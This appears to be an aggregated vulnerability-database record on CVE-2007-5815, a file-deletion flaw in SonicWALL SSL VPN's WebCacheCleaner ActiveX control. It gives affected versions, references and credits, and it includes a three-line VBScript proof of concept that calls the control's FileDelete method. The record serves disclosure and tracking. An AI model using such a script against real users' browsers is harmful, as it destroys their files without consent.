ID
VAR-E-200711-0035
CVE
cve_id: | CVE-2007-5815 | Trust: 1.9 |
cve_id: | CVE-2007-5603 | Trust: 0.8 |
cve_id: | CVE-2007-5814 | Trust: 0.3 |
EDB ID
30730
TITLE
SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion - Windows remote Exploit
Trust: 0.6
DESCRIPTION
SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File Deletion. CVE-2007-5815CVE-45534 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sonicwall | model: | ssl vpn webcachecleaner | scope: | eq | version: | 1.33 | Trust: 1.0 |
vendor: | sonicwall | model: | ssl-vpn netextender activex control | scope: | - | version: | - | Trust: 0.5 |
vendor: | sonicwall | model: | ssl vpn | scope: | eq | version: | 1.33 | Trust: 0.3 |
vendor: | sonicwall | model: | ssl vpn | scope: | ne | version: | 2002.1 | Trust: 0.3 |
vendor: | sonicwall | model: | ssl vpn | scope: | ne | version: | 2.5 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/26288/info
SonicWALL SSL VPN Client is prone to multiple remote vulnerabilities. The issues occur in different ActiveX controls and include arbitrary-file-deletion and multiple stack-based buffer-overflow vulnerabilities.
Attackers can exploit these issues to execute arbitrary code within the context of the affected application and delete arbitrary files on the client's computer. Failed exploit attempts will result in denial-of-service conditions.
These issues affect SonicWALL SSL VPN 1.3.0.3 software as well as WebCacheCleaner 1.3.0.3 and NeLaunchCtrl 2.1.0.49 ActiveX controls; other versions may also be vulnerable.
dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
ActiveX FileDelete Method Traversal Arbitrary File Deletion
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | overflow | Trust: 0.5 |
tag: | arbitrary | Trust: 0.5 |
CREDITS
Will Dormann
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 30730 | Trust: 1.9 |
db: | NVD | id: | CVE-2007-5815 | Trust: 1.9 |
db: | BID | id: | 26288 | Trust: 1.9 |
db: | NVD | id: | CVE-2007-5603 | Trust: 0.8 |
db: | EDBNET | id: | 52354 | Trust: 0.6 |
db: | PACKETSTORM | id: | 83233 | Trust: 0.5 |
db: | CERT/CC | id: | VU#298521 | Trust: 0.3 |
db: | NVD | id: | CVE-2007-5814 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-5815 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/26288/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/30730/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2007-5603 | Trust: 0.5 |
url: | http://www.kb.cert.org/vuls/id/298521 | Trust: 0.3 |
url: | http://support.microsoft.com/kb/240797 | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/30730 | Trust: 0.3 |
url: | http://www.sonicwall.com | Trust: 0.3 |
SOURCES
db: | BID | id: | 26288 |
db: | PACKETSTORM | id: | 83233 |
db: | EXPLOIT-DB | id: | 30730 |
db: | EDBNET | id: | 52354 |
LAST UPDATE DATE
2022-07-27T09:23:08.931000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 26288 | date: | 2007-11-15T00:37:00 |
SOURCES RELEASE DATE
db: | BID | id: | 26288 | date: | 2007-11-01T00:00:00 |
db: | PACKETSTORM | id: | 83233 | date: | 2009-11-26T00:34:53 |
db: | EXPLOIT-DB | id: | 30730 | date: | 2007-11-01T00:00:00 |
db: | EDBNET | id: | 52354 | date: | 2007-11-01T00:00:00 |